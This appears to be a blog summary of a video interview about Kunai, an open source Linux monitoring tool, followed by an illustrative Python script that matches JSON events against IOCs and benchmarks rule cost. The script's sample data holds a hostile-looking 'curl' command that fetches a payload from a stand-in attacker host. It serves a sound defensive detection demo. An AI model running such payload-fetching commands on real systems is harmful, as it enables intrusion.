
New Video from @NoLimitSecu: Discussing Kunai, an Open Source Linux Monitoring Tool
In this video, the No Limit Secu team welcomes Quentin Jérôme to discuss Kunai, an open source monitoring tool for Linux. Quentin, who has been working in Luxembourg for about a decade, has extensive experience in incident response and in developing open source projects. He explains that Kunai was created to fill a gap in Linux monitoring, inspired by his positive experience with Sysmon on Windows. Sysmon for Linux, developed by Microsoft, did not meet his expectations because it mimicked Windows-specific events too closely instead of accounting for what is specific to Linux. That led him to write Kunai, a tool better suited to Linux monitoring needs. The name "Kunai" refers to a small Japanese knife, chosen to suggest a versatile and effective tool.

Kunai emits its events as JSON, which is easier to parse than the XML-based event log output of Sysmon. Quentin has also integrated YARA-X, the Rust rewrite of YARA, so that files can be scanned in response to events observed at runtime. YARA is a pattern-matching tool used to detect malware with custom signatures. Kunai can raise alerts based on IOCs (Indicators of Compromise) and take actions such as killing a process or scanning a file with YARA-X. He clarifies that Kunai has its own rule engine for detection on live events, separate from the YARA rules used for pattern matching on file content.

On performance, Quentin acknowledges that the overhead depends on how the rules are written and on how many are loaded. He encourages users to measure rule performance in a CI/CD pipeline so that a costly rule is caught before it degrades a production system. Kunai ships as a static binary with no dependencies and supports Linux kernels from 5.4 to 6.12. He is currently working on new events covering the io_uring stack and on additional actions such as quarantining suspicious files or blocking network traffic.

For the future, Quentin hopes to receive more feedback and contributions from users. He stresses the value of feedback, including negative feedback, for improving the project, and invites anyone who wants to learn Rust to contribute to Kunai. In conclusion, Kunai is a promising Linux monitoring tool, with a detection rule engine and YARA-X integration that make it a practical option for threat detection. Quentin encourages users to try Kunai and share their feedback so the project can keep improving.
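The workflow described above (JSON events in, IOC-based rule matching, then an action such as killing the process or scanning the file, with the cost of the rule set measured as a CI gate) can be illustrated with the following added example. This is not Kunai's code, rule syntax or event schema: the event fields (`event`, `pid`, `exe`, `sha256`, `dst`, `path`), the rule structure and the action names are assumptions made only to show the idea, and the sample events are constructed.

```python
"""Illustrative event-driven IOC matching with actions and a rule-cost check.

Added example, not Kunai's own code. The event shape, field names, rule
structure and action names below are assumptions, not Kunai's real schema.
"""
import json
import time

# Constructed sample events in newline-delimited JSON (not Kunai's actual format).
SAMPLE_EVENTS = "\n".join([
    json.dumps({"event": "execve", "pid": 4021, "exe": "/usr/bin/curl",
                "sha256": "a" * 64, "cmdline": "curl http://evil.example/payload"}),
    json.dumps({"event": "connect", "pid": 4021, "dst": "evil.example", "port": 80}),
    json.dumps({"event": "file_write", "pid": 4021, "path": "/tmp/.x/payload",
                "sha256": "b" * 64}),
    json.dumps({"event": "execve", "pid": 4022, "exe": "/usr/bin/ls",
                "sha256": "c" * 64, "cmdline": "ls -la"}),
])

# Constructed IOC set: file hashes and destination domains considered malicious.
IOCS = {
    "sha256": {"b" * 64},
    "domain": {"evil.example"},
}

# Each rule names the event types it applies to, a predicate over the event,
# and the actions to take on a match. The type filter is checked first so the
# cheap test gates the predicate, which is where rule cost usually hides.
RULES = [
    {"name": "ioc.hash", "events": {"execve", "file_write"},
     "match": lambda e: e.get("sha256") in IOCS["sha256"],
     "actions": ["scan", "kill"]},
    {"name": "ioc.domain", "events": {"connect"},
     "match": lambda e: e.get("dst") in IOCS["domain"],
     "actions": ["kill"]},
]


def parse_events(ndjson: str) -> list[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def evaluate(events: list[dict], rules: list[dict]) -> list[dict]:
    """Return one alert per (event, rule) match, carrying the rule's actions."""
    alerts = []
    for ev in events:
        for rule in rules:
            if ev["event"] in rule["events"] and rule["match"](ev):
                alerts.append({"rule": rule["name"], "pid": ev["pid"],
                               "actions": list(rule["actions"])})
    return alerts


def plan_actions(alerts: list[dict]) -> list[str]:
    """Dry-run action dispatch: describe what would be done, without doing it."""
    planned = []
    for alert in alerts:
        for action in alert["actions"]:
            planned.append(f"{action}:pid={alert['pid']}:rule={alert['rule']}")
    return planned


def benchmark_rules(events: list[dict], rules: list[dict], iterations: int = 200) -> float:
    """Average microseconds spent per event over the rule set.

    A CI job can fail the build when this exceeds a budget, which is the
    kind of check the text recommends before shipping new rules."""
    start = time.perf_counter()
    for _ in range(iterations):
        evaluate(events, rules)
    elapsed = time.perf_counter() - start
    return elapsed / (iterations * len(events)) * 1e6


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    found = evaluate(evs, RULES)
    for line in plan_actions(found):
        print(line)
    print(f"rule cost: {benchmark_rules(evs, RULES):.2f} us/event")
```

Running the block alerts on the connect to `evil.example` and on the write of the file whose hash is in the IOC set, and prints the actions a real agent would carry out (here only described). The benchmark function is the piece to wire into CI: call it on a representative event sample and fail the job when the per-event cost exceeds an agreed budget.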